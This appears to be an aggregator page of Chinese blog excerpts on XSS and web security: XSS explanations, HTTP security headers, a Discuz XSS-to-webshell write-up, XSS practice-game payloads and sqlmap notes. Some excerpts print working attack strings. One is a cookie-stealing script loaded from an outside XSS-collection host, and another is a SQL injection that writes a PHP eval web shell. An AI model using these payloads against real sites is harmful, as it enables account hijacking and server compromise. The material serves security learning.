xss

XSS详解

限于喜欢 提交于 2020-03-20 03:28:10
什么是XSS( 跨站脚本攻击 ) XSS又叫CSS (Cross Site Script) ,跨站脚本攻击 。 它指的是恶意攻击者往Web页面里插入恶意html代码或者javascript代码,当用户浏览该页之时,嵌入其中Web里面的html代码或者javascript代码会被执行,从而达到恶意的特殊目的。 XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用户访问网页时在其浏览器中进行执行。攻击者通过插入的脚本的执行,来获得用户的信息,比如cookie,发送到攻击者自己的网站(跨站了)。 XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。 在WEB2.0时代,强调的是互动,使得用户输入信息的机会大增,在这个情况下,我们作为开发者,在开发的时候,要提高警惕。 XSS的攻击手段(或者叫攻击的目的) 盗用Cookie获取到一些敏感的信息: 在网页浏览中我们常常涉及到用户登录,登录完毕之后服务端会返回一个cookie值。这个cookie值相当于一个令牌,拿着这张令牌就等同于证明了你是某个用户 如果你的cookie值被窃取,那么攻击者很可能能够直接利用你的这张令牌不用密码就登录你的账户

HTTP安全响应头

不羁岁月 提交于 2020-03-19 12:44:53
最近在做安全扫描相关的工作,appscan扫描出来的一些项目,提示未添加安全头。于是在内网和google上到处搜了下。大致弄懂了。现在做个笔记吧。 什么是安全响应头:现代浏览器提供了一些安全相关的响应头,使用这些响应头一般只需要修改服务器配置即可,不需要修改程序代码,成本很低。 目的:保护用户的安全,也就是通常意义上的防止用户受到各种攻击,如XSS、CSRF。 1.Content-Security-Policy 中文名内容安全策略,简称CSP,主要的思想是通过内容来源白名单机制,使浏览器仅渲染或执行来自这些来源的资源。 例如,如果我们仅信赖来自www.exapmle.com和自己服务器上的资源,我们可以通过以下配置来确定: Content-Security-Policy: default-src 'self' https://www.exapmle.com 这里我们使用default-src指令设置了默认资源的来源,当收到来自非本服务器或exapmle.com的站点内容时,由于白名单机制,将不会被执行。需要注意的是,default-src指令定义未指定的大多数指令的默认值。 一般情况下,这适用于以 -src 结尾的任意指令。如果未设置诸如script-src等用于覆盖default-src,那么就会默认遵从default-src的设置。 下面列出一些常见的指令: base-uri

Discuz XSS得webshell

不羁的心 提交于 2020-03-19 04:35:52
By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<6.1.0,gbk+utf+big5 3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.php?goto=findpost&pid=54794&ptid=8706当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.分析和写EXP的过程中,得到t0by57的大力帮助.他PHP和JS都不错的哦!我也希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等.. ----------------------------------------------------------前言分隔线----------------------------------------------------------------------------- problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交

XSS小游戏的通关之路

我是研究僧i 提交于 2020-03-17 04:58:04
1.开始 <script>alert('a')</script> <script>alert(1)</script> <script>confirm("完成的不错!")</script> <script>prompt("完成的不错!")</script> 2.注意闭合 test"> <script>alert('1')</script> test"><script>confirm("完成的不错!")</script> test"><script>prompt("完成的不错!")</script> 3.尖括号被过滤,用事件来触发,单引号闭合 ' οninput=alert`1` // ' οninput=alert`1` ' ' οnchange=alert`1` // ' οnchange=alert`1` ' ' οnclick='window.alert() 来源: http://www.runoob.com/jsref/event-oninput.html oninput 事件 实例 当用户向 <input> 中尝试输入时执行 JavaScript:<input type="text" οninput="myFunction()"> 定义和用法 oninput 事件在用户输入时触发。 该事件在 <input> 或 <textarea> 元素的值发生改变时触发。 提示:

xss之渗透测试

一世执手 提交于 2020-03-14 23:10:52
跨站脚本攻击:cross site script execution(通常简写为xss,因css与层叠样式表同名,故改为xss),是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式,很多人对于xss的利用大多停留在弹框框的程度,一些厂商对xss也是不以为然,都认为安全级别很低,甚至忽略不计,本文旨在讲述关于跨站脚本攻击的利用方式,并结合实例进行分析。 我们构造的获取cookie的xss脚本代码,已经成功的提交到了网站后台。 代码: </textarea>'"><script src=http://x.imlonghao.com/3E3nja?1371821300></script> 或者 </textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fx.imlonghao.com%2F3E3nja%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName

xss攻击的初步了解

蓝咒 提交于 2020-03-12 23:56:53
什么是XSS攻击 XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。 它指的是恶意攻击者往Web页面里插入恶意HTML代码和客户端脚本,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 攻击目的: 其一:盗走客户端 cookies,或者任何可以用于在 Web 站点确定客户身份的其他敏感信息 . 其二:通过脚本注入DB,攻击web站点。 攻击危害: 挂马 , 盗取用户Cookie ,DOS(拒绝服务)客户端浏览器, 钓鱼攻击 ,高级的钓鱼技巧。 , 删除目标文章、 恶意篡改数据、嫁祸,劫持用户Web行为,甚至进一步渗透内网,爆发Web2.0蠕虫,蠕虫式的DDoS攻击,蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据。 XSS分类 XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS。 1、反射型XSS 发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。 一个简单的例子: http://www.a.com/xss/reflect.php的代码如下: <?php echo $_GET['x']; ?> 如果输入x的值未经任何过滤就直接输出,提交: http:/

跨站脚本攻击XSS

白昼怎懂夜的黑 提交于 2020-03-11 16:58:17
跨站脚本攻击XSS 一、XSS简介 1.1 XSS攻击的危害包括 1.2 XSS原理解析 1.2.1 XSS(反射型) 1.2.2 XSS(存储型) 二、构造XSS脚本 2.1 常用HTML标签 2.2 常用JavaScript方法 2.3 构造XSS脚本 2.3.1 弹窗警告 2.3.2 页面嵌套 2.3.3 页面重定向 2.3.4 弹框警告并重定向 2.3.4 访问恶意代码 2.3.5 巧用图片标签 2.3.5 绕开过滤的脚本 2.3.6 收集用户cookie 三、自动化XSS 3.1 BeEF简介 3.2 信息收集 3.3 持久化控制 3.4 社会工程 3.5 渗透攻击 3.6 BeEF基础 一、XSS简介 跨站脚本(cross site script)为了避免与css混淆,所以简称为XSS。 XSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。 XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 1.1 XSS攻击的危害包括 盗取各类用户账号,如机器登录账号、用户网银账号、各类管理员账号。 控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力。

sqlmap续

大城市里の小女人 提交于 2020-03-09 22:46:16
sqlmap 续 注入语句 ( 知道绝对路径时候可用 ) http://192.168.99.171/test2/sqli/example10.php?catid=3 ’ union select 1,’<? @eval($_POST[xy])?>’,3,4 into outfile ‘C:/xampp/htdocs/test2/xinyu2.php ‘ --+ 检测注入: http://192.168.99.171/test/xinyu2.php 若有返回内容则已经写入 form 表单 --random-agent 随机请求 --cookie=COOKIE 身份赋予 --technique=TECH SQL injection techniques to use (default "BEUSTQ")T 时间 E 错误 C --dns-domain=DNS.. Domain name used for DNS exfiltration attack --DNS 域 =DNS.. 用于 DNS 渗出攻击的域名 burp 与 wireshark 的区别 http 协议抓包工具 burp ,能改能发,实时互动 wireshark 不能改只能抓住 burp : target (目标) proxy (代理) spider scanner intruder repeater sequencer

网络安全行业面试知识点

隐身守侯 提交于 2020-03-08 12:21:11
信息收集 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄漏等 传输协议,通用漏洞,exp,github源码等 漏洞挖掘 浏览网站,看看网站规模,功能,特点等 端口,弱口令,目录等扫描,对响应的端口进行漏洞探测,比如 rsync,心脏出血,mysql,ftp,ssh弱口令等。 XSS,SQL注入,上传,命令注入,CSRF,cookie安全检测,敏感信息,通信数据传输,暴力破解,任意文件上传,越权访问,未授权访问,目录遍历,文件 包含,重放攻击(短信轰炸),服务器漏洞检测,最后使用漏扫工具等 漏洞利用 | 权限提升 mysql提权,serv-u提权,oracle提权 windows 溢出提权 linux脏牛,内核漏洞提权e 清除测试数据 | 输出报告 日志、测试数据的清理 总结,输出渗透测试报告,附修复方案 复测 验证并发现是否有新漏洞,输出报告,归档 问题 在渗透过程中,收集目标站注册人邮箱对我们有什么价值? 丢社工库里看看有没有泄露密码

Java Web开发 - 持久型/存储型XSS漏洞

可紊 提交于 2020-03-08 08:33:02
Java Web开发 - 持久型/存储型XSS漏洞 1、什么是XSS漏洞攻击?   XSS是跨站脚本攻击(Cross Site Scripting)的简称,之所以叫XSS而不是CSS相比大家都能明白了吧,那就是为了跟层叠样式表(Cascading Style Sheets,CSS)区别。 2、XSS漏洞攻击的原理   恶意攻击者往web页面中插入恶意HTML代码,当用户浏览该web页面时,嵌入到该web页面的恶意HTML代码就会被执行,从而达到恶意攻击用户的特殊目的。   XSS漏洞又分为两类,一类是持久型/存储型XSS,另一类是反射型XSS;   1)持久型/存储型XSS:嵌入到web页面的恶意HTML会被存储到应用服务器端,简而言之就是会被存储到数据库,等用户在打开页面时,会继续执行恶意代码,能够持续的攻击用户;   2)反射型XSS:反射型XSS是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游览器执行,从而达到攻击目的;   本次主要说的是持久型/存储型XSS漏洞攻击 3、下面是一个示例   1)这个页面时个简单的添加页面   2)保存成功之后,可以去查看下数据库,备注字段中的JavaScript代码已经存储到数据库中了,如下:   3)在打开用户查询列表的页面